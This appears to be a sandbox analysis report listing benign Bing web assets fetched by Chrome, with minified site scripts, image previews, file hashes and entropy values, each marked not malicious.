                                                                                                      Preview:var KeyPressScroll;(function(){function i(i){var u=i.key,f=document.activeElement,r,e,o;document.querySelector("cib-serp[mode='conversation']")||document.querySelector(".b_selected")||typeof i.composedPath=="function"&&(r=i.composedPath(),r&&r[0]&&(r[0]instanceof HTMLInputElement||r[0]instanceof HTMLTextAreaElement))||i.ctrlKey||i.shiftKey||i.metaKey||i.altKey||!u||u.length!==1||u===" "||f instanceof HTMLInputElement||f instanceof HTMLTextAreaElement||f instanceof HTMLElement&&f.isContentEditable||(typeof sj_log=="function"&&sj_log("CI.KeyPressScroll","KeyBoard_Triggered",u),n.value="",t.scrollIntoView({behavior:"smooth"}),t.style.display="block",e=_ge("sb_form"),e&&Lib.CssClass.remove(e,"form_sb_hidden"),n.focus(),n.click(),o=n.value,n.setSelectionRange(o.length,o.length))}function r(){n&&t&&sj_be(document,"keydown",i,!0)}var n=_ge("sb_form_q"),t=_ge("b_header");r()})(KeyPressScroll||(KeyPressScroll={}))
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):226
                                                                                                      Entropy (8bit):4.923112772413901
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:2LGfGIEW65JcYCgfkF2/WHRMB58IIR/QxbM76Bhl:2RWIyYCwk4/EMB5ZccbM+B/
                                                                                                      MD5:A5363C37B617D36DFD6D25BFB89CA56B
                                                                                                      SHA1:31682AFCE628850B8CB31FAA8E9C4C5EC9EBB957
                                                                                                      SHA-256:8B4D85985E62C264C03C88B31E68DBABDCC9BD42F40032A43800902261FF373F
                                                                                                      SHA-512:E70F996B09E9FA94BA32F83B7AA348DC3A912146F21F9F7A7B5DEEA0F68CF81723AB4FEDF1BA12B46AA4591758339F752A4EBA11539BEB16E0E34AD7EC946763
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/MWgq_OYohQuMsx-qjpxMXsnruVc.js
                                                                                                      Preview:(function(n,t,i){if(t){var r=!1,f=function(){r||(r=!0,typeof wlc!="undefined"&&wlc(sj_evt,sj_cook.set,wlc_t))},u=function(){setTimeout(f,t)};n.bind("onP1",function(){i?n.bind("aad:signedout",u):u()},1)}})(sj_evt,wlc_d,wlc_wfa)
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1496
                                                                                                      Entropy (8bit):7.821931333783295
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Z6Idbelly6IUAFtlM083pL7XjdNAABnfd+9X1++boZZIuiHv04Kq13WrNmii:5ZulCUA/lM0CJEH++biFiP04Kq13ufi
                                                                                                      MD5:4A7889D25CDE7BD9F67F4BEE0889EA5C
                                                                                                      SHA1:CD0A7A8DA725683FF70072B3D44D6FC51867F1FE
                                                                                                      SHA-256:6BB64C51615C8FF3DBBFD3E298D0C1BB068E6D68062B681267A51FBCF72D29CD
                                                                                                      SHA-512:9F7FF727AFD61C6F715A878134FCCF4257C4BB6946CE8A45221C8370890A5EA652E5C80C954EDEFC406BDBD904FA03F70DC22ED9EC9B55B98A9092B1DC11B936
                                                                                                      Malicious:false
                                                                                                      URL:https://th.bing.com/th?id=ODLS.b2c1ffa2-2d93-46d4-b6a7-a692268e09f6&w=32&h=32&qlt=92&pcl=fffffa&o=6&pid=1.2
                                                                                                      Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J....zIDATXG..}L.G.....%3../3.(.....l.2...8.."Zy..R:..../...i..J.B.-.v bW..f.'.U...%Q.,fq.q...=.p.Ri..'....s.}.{.c..?.....~...qO}.m......G7Iw..p....TW{.....o<....Rxs`...^f....0vL.......]B..r...!P.|..;-......:..&0...H..].P>fdf{`l...(F.f......Ax.C..*.YQ..>..H,..r[..e.6.*.{f..6....q...q.=.R...8aW5...Q.R|.;.=.&.!z.TcR[[').wZ....G..&..%%Tb,..'.T.....H.A..._..y.Jj.....o.2...@.e..U..@R....;.......Jt.d&...w....i...oj...Fe{...y.....d...j.~.2.p...Ar......X.E6..n@...(..\.P(|h(Yv...k...._(.,..Eff..;Rw.Y.....X...P.d8j@rn@.Ry../.|..p.A./#...BBW<_.5...../.}.:\0 ....Y.2^[......q"R...3~.......P.....&''.'...[....=........6E...}.lB.,k..-F...>.......y0...p...........wA.G.V.,...2.F..\...5..Y.bu.".O>~)5.?..I.........I."JQ.5...7@..O.8C.k.._...0.w.....Z..i....).Q..3..X...Z..}...9._3.....YgI..'8|..1.....]@}..'.Q6.o0..bu..m\p.......M.9...._.W>...~3.....p..Y.|..-......Av`...ap..C{/.c5.#....I2.L$.,*...
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:08:01 11:40:12], progressive, precision 8, 160x160, components 3
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):6817
                                                                                                      Entropy (8bit):7.859219052464007
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:sO4w46jQPjxS2VUxVMkjqHqHfGaOUE37ri:sO346jojxR0WKHfoe
                                                                                                      MD5:0C41EE31B04E978B4882D17690F03A3A
                                                                                                      SHA1:1890E62ABDFF4D2DD0A66E8A10BF5429440A50EE
                                                                                                      SHA-256:97785743A5FFC303FF8B7B465CD12AF8403F7EED2B2D19687E118E2621059741
                                                                                                      SHA-512:88555E4C500A6B416E8A8E783497B1F6925EEAF708991080E3776757102D9D522CA4830CE924ACA23EC55C579AAC5CFCA7116343236FE8BF8A13FB2DFBD104AD
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/GJDmKr3_TS3Qpm6KEL9UKUQKUO4.jpg
                                                                                                      Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:08:01 11:40:12....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;...........................................................................................!e."E.T....!......S-C`!..bB.e.J2.z..:<....9.=.[....... .l..Rwy...X..s..u....!.a gNe..+......r...!..-8ZX%..!.e..e../.]..e.vk.R0._;.|..<hE...l..i..,.s.Ec.e.G..T....|.s..K..............+.|.q.=..1*r..$vSb..^q.(hk/..w8...;.v..p:.....C.k.....q.(.M..M.....}q.r+...N.....#.xK.O.....Ci.S=s...}ea[..>MC4.zN;w.Z.%...g.....jo:.g..L.7.......K3...oa.}.=3.<No.|*l..q...#Iszt.z..g..%...z..m.....q....t.L%.\Xc..r:.a...........*s{.A..=.z%.W....y}}..W..2......*^..s..^...R.$..K..E'M........c.[..Buhvu....H...7N.=...o|...Z[\.:.=..3.......jP...k....p.....r. ...!R.z2....*`T.......H.*k,..`.@..$P@G...(....
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (891), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):891
                                                                                                      Entropy (8bit):5.1332488883366585
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2QG5MCVFmMCBTotKMCWqEZWMCUHK09nzEIzGln:GbGb+Eb5EgbCr9nz+ln
                                                                                                      MD5:02B0B245D09DC56BBE4F1A9F1425AC35
                                                                                                      SHA1:868259C7DC5175A9CC1E2EC835F3D9B4BD3F5673
                                                                                                      SHA-256:62991181637343332D7B105A605AB69D70D1256092355CFC4359BEE7BDBFB9C6
                                                                                                      SHA-512:CBB43000A142807FF1BB3BFAC715CEF1240233117C728F357C824CE65B06BE493DF2306C7B03598817F09B02E9E36EC52314F88467679C5BEF3EE1504A10C7E6
                                                                                                      Malicious:false
                                                                                                      Preview:(function(){function e(){var t,r;n&&(n.value.length>0?(t=Lib===null||Lib===void 0?void 0:Lib.CssClass)===null||t===void 0?void 0:t.add(sj_b,i):(r=Lib===null||Lib===void 0?void 0:Lib.CssClass)===null||r===void 0?void 0:r.remove(sj_b,i))}function o(t){var e,o;n.value="";n.innerText="";u&&f&&(u.innerText="",f.classList.remove("nudgeVisible"));(e=Lib===null||Lib===void 0?void 0:Lib.CssClass)===null||e===void 0?void 0:e.remove(sj_b,i);sj_log("CI.XButton","Clicked","1");r&&((o=Lib===null||Lib===void 0?void 0:Lib.CssClass)===null||o===void 0?void 0:o.add(r,"b_focus"));n.focus();n.click();t&&(t.preventDefault(),t.stopPropagation())}var r=_ge("b_header"),n=_ge("sb_form_q"),t=_ge("sb_clt"),u=_qs(".qfc.b_searchbox .ghost"),f=_qs(".qfc.b_searchbox .nudge"),i="b_sbText";n&&t&&(sj_be(t,"click",o),sj_be(t,"keydown",function(n){var t=n.code||n.key;t==="Enter"&&o(n)}),sj_be(n,"keyup",e),e())})()
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (918), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):918
                                                                                                      Entropy (8bit):5.212381384143468
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:i2387E/Xv3qtMbKRgibYe9BqoGbKR7oGbY7oGbnewCY0ZWFU0fZy5c6MwQOR:dqtMbK7bLrGbKuGbjGbnXTWWSr5c6MwV
                                                                                                      MD5:341FC0ACD15DF6D8A064E4C3A896F65D
                                                                                                      SHA1:1258FD48A874D80CB635BE454F9E4023A0DF7C49
                                                                                                      SHA-256:4BC6635D4D95F9C05A91904B19370A40CC6E4C2AB43661C00615EDDADEFCF9EB
                                                                                                      SHA-512:6B552D786E782C36F17BEE1A6AE204F1E8C9F85BE5EB9ADAC1793D60B537CAD13228CB2D4299949F051E6BC364C2E5A4105DE9BBF2885F492EDB425CB14CE982
                                                                                                      Malicious:false
                                                                                                      Preview:var KeyPressScroll;(function(){function i(i){var u=i.key,f=document.activeElement,r,e,o;document.querySelector("cib-serp[mode='conversation']")||document.querySelector(".b_selected")||typeof i.composedPath=="function"&&(r=i.composedPath(),r&&r[0]&&(r[0]instanceof HTMLInputElement||r[0]instanceof HTMLTextAreaElement))||i.ctrlKey||i.shiftKey||i.metaKey||i.altKey||!u||u.length!==1||u===" "||f instanceof HTMLInputElement||f instanceof HTMLTextAreaElement||f instanceof HTMLElement&&f.isContentEditable||(typeof sj_log=="function"&&sj_log("CI.KeyPressScroll","KeyBoard_Triggered",u),n.value="",t.scrollIntoView({behavior:"smooth"}),t.style.display="block",e=_ge("sb_form"),e&&Lib.CssClass.remove(e,"form_sb_hidden"),n.focus(),n.click(),o=n.value,n.setSelectionRange(o.length,o.length))}function r(){n&&t&&sj_be(document,"keydown",i,!0)}var n=_ge("sb_form_q"),t=_ge("b_header");r()})(KeyPressScroll||(KeyPressScroll={}))
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1614
                                                                                                      Entropy (8bit):7.8244061031886245
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:mAaDK9jIctS6TyvTJNxoYd/BHyXmPxG1ynvA8FDyVL0MJIFZ/TyOLcxm3mbZ6mQA:mAaDKGg7TyLddFh5GHL0MaZTypb4ba1
                                                                                                      MD5:F8B531C208D8985DA7C66FB1FA0B5274
                                                                                                      SHA1:FB56E32D7E99F00915693AB0FEA930580FC85AB0
                                                                                                      SHA-256:CADFA6AF0EAE29E39F468C015A93CFA565D2E7575C2151012EFA529E750AA2AF
                                                                                                      SHA-512:F8EBCB69B231A191B1EC321B725400BAF44AF3F9A1A87DC82D08669EB9AE920FEB98615E1BBA497D1DA7521E39A93EBC078F70386C140C4A93E3400B365485C5
                                                                                                      Malicious:false
                                                                                                      URL:https://th.bing.com/th?id=ODLS.615c8fef-df97-42ef-9825-91877a0967a2&w=32&h=32&qlt=94&pcl=fffffa&o=6&pid=1.2
                                                                                                      Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J.....IDATXG.Vkl.U..ZD;.....*."..@-X.1.6.....~.#Twgggv...(.).5..R.....;3....R.....Z...i0Q....sg/.....|...=..=..s3..0..a........!.XO.th.A..m........VV~.WXu..A....v.'.|.n....+..7....T...Y:<..|.|..~2u..9[;.rJ._.x.%tx|Ar.S.~.s.m...@@...r."........C...<yvM|...0U]..EP.go.... .*.{,..n/.._7.2~..^A....Z....2.J?\.a.Z....'*....!.?>....'b`1bp..u./28..:hqG.P..#.*Z..J....&.J........QbyU.b*.[@n3..%6.E..8G..w.@.V....:[..m#h'.i..9.........`9..!.....7g.j.A.}X..$...j.<#xg.B..j...v..5|.Ib....2H.,...H.....M.-..b4..X...(..lIM./B.~.B.0y;..?..A.$...M..........\........e;.q.y...4Xo....$..C.E.u<.d.h@.:7i.X.a.....p.....`.mV)..^^bk.....`!.,.V*.7....~'......0fj@;|>.ub..!.A....J..6..^.-.......y..$.X.......\.u...z.`...Q.~.V...Q..C.M....f...[.de|.U...~.bp......a...a.H...rB(......a...X. ....X...%OG....sI...u......|..~.o....I.r....Q.......Z3.....<Z..}|A.6.1....b..h`...._.B...9...-.._./?.xy/r..Q.#@.......
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (1060), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1060
                                                                                                      Entropy (8bit):5.351152776949957
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2QmZ6qv3dhazSaxa7onMZN1GqPTz0KmNn4zVAoL3tMTCDU1nAA9zR9uHemdXp:2Om74MZN1tPv0KmNjAtMGD0zRPo
                                                                                                      MD5:F4DA106E481B3E221792289864C2D02A
                                                                                                      SHA1:D8BA5C1615A4A8ED8EE93C5C8E2EA0FB490A0994
                                                                                                      SHA-256:47CB84D180C1D6BA7578C379BDC396102043B31233544E25A5A6F738BB425AC9
                                                                                                      SHA-512:66518EE1B6C0DF613074E500A393E973844529CA81437C4BAFE6BF111CBA4D697AF4FE36B8D1B2AA9B25F3EB93CD76DF63ABFC3269AC7E9F87C5F28A3764008E
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/2LpcFhWkqO2O6Txcji6g-0kKCZQ.js
                                                                                                      Preview:(function(){function t(t){typeof Log!==n&&typeof Log.Log!==n&&Log.Log("NcHeader","Rewards",t,!0)}function i(){var u,e,r,a,o,v,y,s,i,h;if(typeof bepcfg===n)t("bepcfg Undefined");else if(u=_ge("nc_iid"),u){var c=typeof bepcfg.wb!==n,l=typeof bepcfg.v!==n,f=u.getAttribute("_IG");if(f&&f.length||(f=_G.IG),e="&IID="+u.getAttribute("_iid")+"&IG="+f,l)try{sj_cook.get("")}catch(p){e+="&CID="+u.getAttribute("_cid")}r="/rewardsapp/ncheader?ver="+_G.AppVer+e;a=r;try{o=undefined;v=/(^|&)uncrunched=1(&|$)/i;o=v.exec(_w.location.search.substr(1));r=r+(o?"&uncrunched=1":"")}catch(w){r=a}y=_ge("rewardsEntryPoint");y&&(r="".concat(r,"&loadEntryPointsScript=1"));s=[_w.top,_w];i=sj_gx();i.open("POST",r,!0);i.setRequestHeader("Content-type","application/x-www-form-urlencoded");c&&(i.onreadystatechange=function(){i&&i.readyState==4&&i.status==200&&sj_appHTML(document.body,i.responseText)});h="wb="+(c?bepcfg.wb:"0");l&&(h+=";i="+(s[0]!==s[1].self?0:1)+";v="+bepcfg.v);i.send(h)}else t("nc_iid NotFound")}var
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:58:04], progressive, precision 8, 160x160, components 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4409
                                                                                                      Entropy (8bit):7.661436320849241
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:sZbhwhNizUZvpj+cq69L5CiYXL6UIwLxl3LeD:sWzj+cq615Te+Se
                                                                                                      MD5:A98A08BDB99B8422C9DC9D6FDD9387C3
                                                                                                      SHA1:967E5342AE802167DC06576E0E4FB96E76893296
                                                                                                      SHA-256:5FAB9EE214738E71D6C01392EBC7B1EEC09EF8E19CA508EF28154E3E7A769ACF
                                                                                                      SHA-512:660020F40078ADA6A3E3DB7B55063D3E3603F82CFBB3ACF81FE2DF53F23064414C78DAF8657C6E556ADCC4D2034EC077F8C0B4A7720018E457DAFDEEF0323476
                                                                                                      Malicious:false
                                                                                                      Preview:......JFIF.....H.H......Exif..II*...............J...........R...(...........1.......Z...2.......f.......H.......H.......GIMP 2.10.8.2019:07:31 17:58:04....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;.............................................................................................. (... ....@..........(.@..............(.................R. .......................f.....#x.....6.9.]...f.*...........|:......b...=....M}.}3/...H..{},k...x..`B.....z........y..9.yv.....9....>n...f...W......ug'.x..6:-3.a.iaHB.@.T.. .Q.@.)A.....At`..(..X!..0t).H...........s.uR6E.J.K9.@*.$.Es....&.........................!.. "A$10Bp.............o.wb.H2......p....H..m....ez.5.5....L.%.i....'..).s....$..q...E.....yxe-d<.VI...<s.~K....4.o.?.y.NY3r1..5...M9F..^Q...y..........>$.&r.g ..MK.qe....5.......~!.....\.&|....!5...`9.)F.R;.fY.%.&.={..R.A.....>.y....E.Q._....<.|_...J.....z&_
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                      Category:dropped
                                                                                                      Size (bytes):671
                                                                                                      Entropy (8bit):5.014579690661168
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:tbH4/KYf3UnlcWYl7qy/gk63xsV8tGXcqecDDWUV8jEPsycd23Wt+MKsAnueOc+d:t74LfEnTYpq+gTxs6GUUQEPssmYsAnuH
                                                                                                      MD5:D9ED1A42342F37695571419070F8E818
                                                                                                      SHA1:7DD559538B6D6F0F0D0D19BA1F7239056DFFBC2A
                                                                                                      SHA-256:0C1E2169110DD2B16F43A9BC2621B78CC55423D769B0716EDAA24F95E8C2E9FE
                                                                                                      SHA-512:67F0BC641D78D5C12671FDD418D541F70517C3CA72C7B4682E7CAC80ABE6730A60D7C3C9778095AAB02C1BA43C8DD4038F48A1A17DA6A5E6C5189B30CA19A115
                                                                                                      Malicious:false
                                                                                                      Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... viewBox="0 0 16 16" enable-background="new 0 0 16 16" xml:space="preserve">..<path fill="#919191" d="M15.707,0.293c-0.391-0.391-1.024-0.391-1.415,0L7.994,6.591L1.696,0.293C1.298-0.091,0.665-0.08,0.281,0.318...c-0.375,0.388-0.375,1.003,0,1.391l6.298,6.298l-6.298,6.298c-0.384,0.398-0.373,1.031,0.025,1.415c0.388,0.375,1.003,0.375,1.391,0...l6.298-6.298l6.298,6.298c0.398,0.384,1.031,0.373,1.415-0.025c0.375-0.388,0.375-1.003,0-1.39L9.409,8.006l6.298-6.298...C16.098,1.317,16.098,0.684,15.707,0.293z"/>..<path fill="none" d="M0,0h16v16H0V0z"/>..</svg>..
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (827), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):827
                                                                                                      Entropy (8bit):5.195501381279603
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2Qou8GFu7Qb/P1CM/8/8Tpn8TpcnnIm4aPfm/yyscY/h:ks7fEEymImzu/yysp/h
                                                                                                      MD5:4D718CDD3E0B924B1C2045F57BD07C19
                                                                                                      SHA1:9901424CDD1A9B6B636BCE9215580125070FE3C1
                                                                                                      SHA-256:F76E92F2C3092AB1AD1A0AA8C6ECB431388ACEC658DEAD15DABEA4326A8248CC
                                                                                                      SHA-512:22FB05CF0C242B32EF301582042FB171A0675C1864DCECCE8A3B4FDADB0B741A119C3890D19E292E64C144E7F584A790E077CD7D5800180294F7544584BC4E3F
                                                                                                      Malicious:false
                                                                                                      Preview:(function(){var n,t,i=(n=_w._sydPayWallConfig)===null||n===void 0?void 0:n.loadSydneyConvResWithPayWall,r=(t=_w._sydPayWallConfig)===null||t===void 0?void 0:t.useSydneyPayWall;sj_evt.bind("rewready",function(n){if(n&&n.length>=2){var t=n[1].waitlist;t&&t=="2"&&i&&(typeof SydFSCHelper!="undefined"&&SydFSCHelper.setSydFSCEligibleState?SydFSCHelper.setSydFSCEligibleState(!0):typeof SydneyFSCDecouple!="undefined"&&SydneyFSCDecouple.setSydFSCEligibleState&&SydneyFSCDecouple.setSydFSCEligibleState(!0),sj_evt.fire("waitlistUpdate:eligible"))}},!0);r?i?sj_evt.bind("onP1",function(){typeof SydFSCHelper!="undefined"&&SydFSCHelper.isSydFSCEligible?sj_evt.fire("sydFSCLoaded"):sj_evt.fire("sydFSCPaywallLoaded")},!0,100):sj_evt.fire("sydFSCPaywallLoaded"):sj_evt.bind("convInit:done",function(){sj_evt.fire("sydFSCLoaded")},!0)})()
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (2784), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):2784
                                                                                                      Entropy (8bit):5.308494593036326
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:elqvTe8ACvyVPzlSJNBIAj+9JpwdPcr7buUiAmiIQ8gZ8ku1U1jm:OqKrPzc77WM0SiIQ32ku1f
                                                                                                      MD5:3A53CCDEE6715AB68CDADA74B043D626
                                                                                                      SHA1:3CD6E53AEBFAFE937E6BB5760FA25C53AEB0D5A2
                                                                                                      SHA-256:75DACDD30B50E24162A626A89636F28FD4851FD6C97EC28A832F2AEFF6919A39
                                                                                                      SHA-512:F33706B9BFDB679CFF063AFFC300DAD03B08CB6F5C921487E7DD97882E8C7E3C33034B9C6F0734DFACCD508CA317BFE68EE96DDC9546A2D43B1E3731FF4F75A6
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/PNblOuv6_pN-a7V2D6JcU66w1aI.js
                                                                                                      Preview:var QuickBackRS_Ads_NoAjax;(function(){function s(){var n=_ge("b_results");n!=null&&(t=n.querySelectorAll(k),rt(),tt(),h(o)?sessionStorage.removeItem(o):(sessionStorage[i]&&sessionStorage.removeItem(i),sessionStorage[r]&&sessionStorage.removeItem(r)))}function nt(){var n="sschkad",t="sschvad",i;try{if(typeof Storage=="undefined"||typeof sessionStorage=="undefined"||(sessionStorage.setItem(n,t),i=sessionStorage.getItem(n),sessionStorage.removeItem(n),i!=t))return!1}catch(r){return!1}return!0}function tt(){var l,a,u,s;if(f=h(i),e=h(r),l=h(o),!l&&t&&f&&e){for(n=null,a=-1,u=0;u<t.length;u++)if(s=t[u].querySelector(c),s&&f==s.innerText&&e==u.toString()){n=t[u];a=u+1;break}n&&it()}}function it(){var h=document.getElementById("inline_rs"),p=_ge(v),w,b,l,s,k,y;if(!h||!p){a();return}if(t&&n){if(!ClickBackRSCustomControl)for(w=n.offsetHeight-g,Lib.CssClass.add(n,"qbrs"),n.setAttribute("data-oAH",w+"px"),n.appendChild(h),Lib.CssClass.remove(h,"b_hide"),b=h.offsetHeight,p.style.height=b+"px",l=n.q
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (8674), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):8674
                                                                                                      Entropy (8bit):5.212727429542033
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:a4/1MfRZ4V9bmVKnhHKBEs9F3kBlVD+mxHpfuq:ac1MfRkHpiEs9dkBfDLJfuq
                                                                                                      MD5:1C0981AC86E2EA5B7F08F34548AF3280
                                                                                                      SHA1:57324208DDB3A9E80ABD3346607D712C999C2E50
                                                                                                      SHA-256:00FF3483D93259AEDB929A9FEE4454A623830B18A08F08781AC1961C1E98774A
                                                                                                      SHA-512:0F7185A8579D9BF1B89623BF126C58789010C76F7E279A3F44064C78B2E3E04BB0A89394E6BE185618071153BC872E43A69211255F3470E1120E51AB0D5F2329
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/VzJCCN2zqegKvTNGYH1xLJmcLlA.js
                                                                                                      Preview:(function(n,t,i,r,u,f,e,o,s){function w(n,t,i){var r=[],u;return n&&(i=i||"*",u=n.getElementsByTagName(i),h(u,function(n){nt(n,t)&&r.push(n)})),r}function b(n,t,i){var r=[];return h(n,function(n){var u=w(n,t,i);u&&u.length>0&&(r=r.concat(u))}),r}function bt(n,t){var i=[];return h(n,function(n){var r=null;try{r=n.querySelector(t)}finally{r&&(i=i.concat(r))}}),i}function ut(n){return g[n]||(g[n]=new RegExp("\\b"+n+"\\b")),g[n]}function nt(n,t){var i=n.className||"";return ut(t).test(i)}function y(n,t){n.className=n.className||"";nt(n,t)||(n.className+=" "+t)}function p(n,t){var i=n.className||"",r=ut(t);n&&i&&t&&(n.className=n.className.replace(r,"").replace(/\s+/," "))}function a(n){return f(n),u(n),!1}function kt(n){return(n=n||i.event,n.pageX||n.pageY)?{x:n.pageX,y:n.pageY}:{x:n.clientX+s.scrollLeft-s.clientLeft,y:n.clientY+s.scrollTop-s.clientTop}}function c(n,t){var i=n.currentStyle,r=0,u;return _w.getComputedStyle&&(i=_w.getComputedStyle(n),sb_ie&&(r=parseFloat(i.paddingTop)+parseF
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (560), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):560
                                                                                                      Entropy (8bit):4.742600822971018
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:CFmwsCfyMJoAfrk3bV0tRWERW5kTGb3aINVN/t/jgClRXirA:CFmNWaAwRCRWERW5kTGb3l1tMClRd
                                                                                                      MD5:9B28631B7C46706DBB7EEF2D16D9549B
                                                                                                      SHA1:2A463D97AF924D3B10C250181D0D902562494184
                                                                                                      SHA-256:F8FA36AB6505DA51BEF5521EF84793391BE9C16DE5ABD6BB99C20FE4D1FB48CF
                                                                                                      SHA-512:9E85DB806D0CBEEC5007D0AB90BEFA6CB036995110637EC616D93FCC4A2A9BAF59BB0ABEF98913E5D9FD88BE445C9ABC04E0B6C7533E4384F945CB743A4CF488
                                                                                                      Malicious:false
                                                                                                      Preview:var Lib;(function(n){var t;(function(n){function t(n){return n&&n.classList}function i(n,i){t(n)&&n.classList.add(i)}function r(n,i){t(n)&&n.classList.remove(i)}function u(n,i){t(n)&&n.classList.toggle(i)}function f(n,i){return t(n)&&n.classList.contains(i)}function e(n,t){return n.getElementsByClassName?n.getElementsByClassName(t):null}function o(n){return n instanceof SVGElement?n.getAttribute("class"):n.className}n.add=i;n.remove=r;n.toggle=u;n.contains=f;n.getElementByClassName=e;n.getClassAttribute=o})(t=n.CssClass||(n.CssClass={}))})(Lib||(Lib={}))
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (7155), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):7155
                                                                                                      Entropy (8bit):5.435598317550486
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:paWT3REjhNn5y1Myoy+y25syZWNKo5xp5VUILj/rVEkVu4akUr:paWzEhNn5y1Myoy+y25syq/VUIX/1aka
                                                                                                      MD5:DC221228E109F89B8B10C48F2678FB46
                                                                                                      SHA1:1BFC85CBA5C424136941AC1DFD779A563B5BEED4
                                                                                                      SHA-256:F4FB7234959F48C2B2CA73FD6C35D36EAF65D8C431D982A1BA208F5CDC766419
                                                                                                      SHA-512:46F49E5AC18436251778D1F50C027729A2442ED6541C3162D878720703E37797B6028D96EB1568C23EC5006FB022C8E05855E250D6A1A590F41E890866529CD2
                                                                                                      Malicious:false
                                                                                                      Preview:var QuickSearch;(function(n){function et(n){var t=_w.location.protocol+"//"+_w.location.hostname+"/chat?q="+encodeURIComponent(n)+"&showconv=1&sendquery=1&form=IPRV10";a?window.open(t):_w.location.href=t}function w(n){sb_st(function(){var it,rt,ut,ft,f,a,w,st,d,at,s,v,g,vt,ht,y,p,ct,nt;if(l=null,NodeList.prototype.forEach||(NodeList.prototype.forEach=function(n,t){t=t||window;for(var i=0;i<this.length;i++)n.call(t,this[i],i,this)}),f=window.getSelection(),t=(it=f===null||f===void 0?void 0:f.toString())!==null&&it!==void 0?it:"",a=_ge("qs_searchBox"),w=o?_ge("mfa_root"):null,!o||w!=null){var lt,et=!0;f!=null&&f.anchorNode!=null&&(lt=f.anchorNode.nodeValue||f.anchorNode.textContent,et=!tt.some(function(n){return n!=null&&n!=undefined?n.contains(f.anchorNode):!1}),f.anchorNode.childNodes!=null&&f.anchorNode.childNodes.forEach(function(n){(n.nodeName==="INPUT"||n.nodeName==="TEXTAREA")&&(et=!1)}));st=!0;dt()||f.type=="Range"||(st=!1);t.trim()!=""&&et&&st&&u&&t.trim().length<2048?(sj_log("C
